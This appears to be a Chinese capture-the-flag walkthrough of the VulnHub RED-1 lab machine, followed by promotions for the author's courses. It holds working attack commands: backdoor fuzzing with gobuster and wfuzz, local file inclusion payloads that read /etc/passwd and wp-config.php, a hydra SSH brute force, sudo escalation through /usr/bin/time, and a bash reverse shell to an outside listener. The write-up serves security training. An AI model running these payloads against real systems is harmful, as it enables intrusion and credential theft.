大余每日一攻防RED-1(四)

admin
admin
admin
102803
文章
87
评论
2023年12月5日00:35:33评论64 views字数 3088阅读10分17秒阅读模式

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一首歌送给你们,一首歌一攻防一项目!独家记忆送给大家!

一、网络枚举

大余每日一攻防RED-1(四)
1701670641_656d6ef160c2a869cdc22.png!small?1701670642434

大余每日一攻防RED-1(四)nmap枚举发现ip地址:192.168.3.37

二、web信息收集

大余每日一攻防RED-1(四)
1701670651_656d6efbf3ee1892c9fac.png!small?1701670653807

发现是个Wordpress网站,但是没有正确解析,点击Hello Blue发现无法访问大余每日一攻防RED-1(四)

大余每日一攻防RED-1(四)
1701670664_656d6f0848ab61747938c.png!small?1701670664831
192.168.3.37 redrocks.win

将其添加到主机文件中:大余每日一攻防RED-1(四)再次访问:大余每日一攻防RED-1(四)

三、爆破FUZZ-LFI

根据页面信息看到网站已经被入侵,并且提到有后门,看了其他的地方暂时也没发现什么,那就先看一下后门,因为WordPress 在 Apache PHP上运行。所以应该是 php 后门,用目录扫描看看能不能扫出疑似后门的文件,所以用SecLists里的CommonBackdoors-PHP.fuzz.txt扫。下载地址:

https://github.com/danielmiessler/SecLists

命令执行:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dayu.txt -z

大余每日一攻防RED-1(四)发现可疑文件NetworkFileManagerPHP.php,猜测可能是webshell后门,扫描结果状态码是500,这个脚本可能存在LFI,使用wfuzz测试一下参数:

wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w 1.txt

大余每日一攻防RED-1(四)发现key参数返回200,那就使用key参数测试一下:

http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd

大余每日一攻防RED-1(四)测试成功。说明有文件包含。那接下来查看一下 NetworkFileManagerPHP.php 文件:

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php

大余每日一攻防RED-1(四)通过base64编译发现:

That password alone won't help you! Hashcat says rules are rules

仅凭那个密码对您没有帮助!让我们使用Hashcat规则!

四、base64-hashcat-hydra

提到了密码、Hashcat和规则。由于它是base64编码的,我们可以假设Red在谈论Hashcat的Best64规则为密码突变,想到的这里大概能获取wp-config文件,里面有数据库的密码:

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php

大余每日一攻防RED-1(四)大余每日一攻防RED-1(四)

johnR3v_m4lwh3r3_k1nG!!

用户名是john,前面查看/etc/passwd文件时发现也有john用户,那就用这个用户登录ssh,将密码保存到文件中,然后用hashcat规则破解:

hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
大余每日一攻防RED-1(四)
1701670750_656d6f5ed8c0d2b84e6c3.png!small?1701670751484

使用解出来的密码本进行ssh爆破:

hydra -l john -P passlist.txt 192.168.3.37 ssh 
ssh [email protected]R3v_m4lwh3r3_k1nG!!00
大余每日一攻防RED-1(四)
1701670757_656d6f6549eccf2bf84a2.png!small?1701670758158

五、提权一

查看底下note_from_red.txt文件提示cat存在命令存在问题。大余每日一攻防RED-1(四)发现会以ippsec用户执行/usr/bin/time:大余每日一攻防RED-1(四)提权成ippsec用户:

https://gtfobins.github.io/gtfobins/time/#sudosudo -u ippsec /usr/bin/time /bin/bash
大余每日一攻防RED-1(四)
1701670774_656d6f766e2c5a8bb2472.png!small?1701670775040

切换成功,查看目录发现正准备下一步时ssh连接被断开了:大余每日一攻防RED-1(四)

#!/bin/bashbash -c 'bash -i >& /dev/tcp/192.168.3.56/1234 0>&1'
大余每日一攻防RED-1(四)
1701670786_656d6f82ebf7926436d18.png!small?1701670788202

五、提权二

虽然Red team的信息还在弹,但是已经不会被断开连接了。下载并运行pspy64检查,看看系统在跑哪些进程。下载pspy64,赋权并运行:大余每日一攻防RED-1(四)

大余每日一攻防RED-1(四)
1701670805_656d6f95199cd6fde924d.png!small?1701670805759
/var/www/wordpress/.git/supersecretfileuc.c

大余每日一攻防RED-1(四)发现是定时弹出的脚本,可以上传一个C编写 shell,替代supersecretfileuc.c文件,然后等待 shell 连接,先删除/var/www/wordpress/.git/supersecretfileuc.c和rev文件:

cd /var/www/wordpress/.git/rm -r supersecretfileuc.c
大余每日一攻防RED-1(四)
1701670815_656d6f9f6ee0335c04ade.png!small?1701670815860

写入C编写的shell替换掉原来的supersecretfileuc.c,kali上开启http服务上传:大余每日一攻防RED-1(四)大余每日一攻防RED-1(四)

最后获得root权限!大余每日一攻防RED-1(四)

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!


欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

大余每日一攻防RED-1(四)
1701237386_6566d28ad323e31f56884.png!small?1701237387378

大余每日一攻防RED-1(四)


具体百个课程详情请看:

《2023百个项目渗透教学》更新项目九十一免费攻防大型项目环境

具体安全审计开发课程:

大余安全-2024年《安全审计开发》


原文始发于微信公众号(大余安全):大余每日一攻防RED-1(四)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月5日00:35:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大余每日一攻防RED-1(四)https://cn-sec.com/archives/2268338.html

发表评论

匿名网友 填写信息